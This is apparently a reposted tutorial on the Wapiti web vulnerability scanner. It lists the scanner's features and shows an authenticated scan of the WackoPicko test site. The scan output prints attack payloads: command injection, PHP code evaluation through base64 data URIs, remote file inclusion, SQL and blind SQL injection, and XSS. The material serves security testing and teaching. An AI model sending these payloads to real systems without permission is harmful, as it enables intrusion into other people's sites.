Wapiti web扫描工具使用——支持ssl，看官方示例报告就知道如何支持带cookie和用户名密码的扫描了

2026-02-06 22:30:02 足球世界杯奖金 admin 8999

General features

Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).

Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).

Can give you colors in the terminal to highlight vulnerabilities.

Different levels of verbosity.

Fast and easy way to activate/deactivate attack modules.

Adding a payload can be as easy as adding a line to a text file.

Browsing features

Support HTTP, HTTPS and SOCKS5 proxies.

Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.

Ability to restrain the scope of the scan (domain, folder, page, url).

Automatic removal of one or more parameters in URLs.

Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).

Possibility to set the first URLs to explore (even if not in scope).

Can exclude some URLs of the scan and attacks (eg: logout URL).

Import of cookies (get them with the wapiti-getcookie tool).

Can activate / deactivate SSL certificates verification.

Extract URLs from Flash SWF files.

Try to extract URLs from javascript (very basic JS interpreter).

HTML5 aware (understand recent HTML tags).

Several options to control the crawler behavior and limits.

Skipping some parameter names during attack.

Setting a maximum time for the scan process.

Adding some custom HTTP headers or setting a custom User-Agent.

看官方的示例报告就知道是如何支持cookie和用户名、密码的扫描了：

Hello,

Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies

then use the generated cookie file to launch a Wapiti scan.

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json :

bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json

Choose the form you want to use or enter 'q' to leave :

0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)

1) POST http://wackopicko/users/login.php (0)

data: username=&password=

Enter a number : 1

Please enter values for the following form:

url = http://wackopicko/users/login.php

username: wanda

password: wanda

It can also be done with wapiti-getcookie this way (if you have all necessary informations about the form) :

wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"

Then, I scan the vulnerable website using the cookie and excluding the logout script :

bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json

__ __ .__ __ .__________

/ \ / \_____ ______ |__|/ |_|__\_____ \

\ \/\/ /\__ \ \____ \| \ __\ | _(__ <

\ / / __ \| |_> > || | | |/ \

\__/\ / (____ / __/|__||__| |__/______ /

\/ \/|__| \/

Wapiti-3.0.0 (wapiti.sourceforge.net)

[*] Saving scan state, please wait...

Note

========

This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db

[*] Wapiti found 41 URLs and forms during the scan

[*] Loading modules:

mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock

[*] Launching module exec

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1

Host: wackopicko

---

PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page

Evil request:

GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1

Host: wackopicko

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/admin/index.php?page=login

Content-Type: application/x-www-form-urlencoded

adminname=default&password=letmein

---

PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page

Evil request:

POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/admin/index.php?page=login

Content-Type: application/x-www-form-urlencoded

adminname=default&password=letmein

---

[*] Launching module file

---

Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page

Evil request:

GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1

Host: wackopicko

---

Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page

Evil request:

POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/admin/index.php?page=login

Content-Type: application/x-www-form-urlencoded

adminname=default&password=letmein

---

[*] Launching module sql

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1

Host: wackopicko

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/admin/index.php?page=login

Content-Type: application/x-www-form-urlencoded

adminname=default&password=letmein

---

[*] Launching module xss

---

XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query

Evil request:

GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/

---

[*] Launching module blindsql

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1

Host: wackopicko

---

Received a HTTP 500 error in http://wackopicko/admin/index.php

Evil request:

POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1

Host: wackopicko

Referer: http://wackopicko/admin/index.php?page=login

Content-Type: application/x-www-form-urlencoded

adminname=default&password=letmein

---

[*] Launching module permanentxss

Report

------

A report has been generated in the file /home/devloop/.wapiti/generated_report

Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.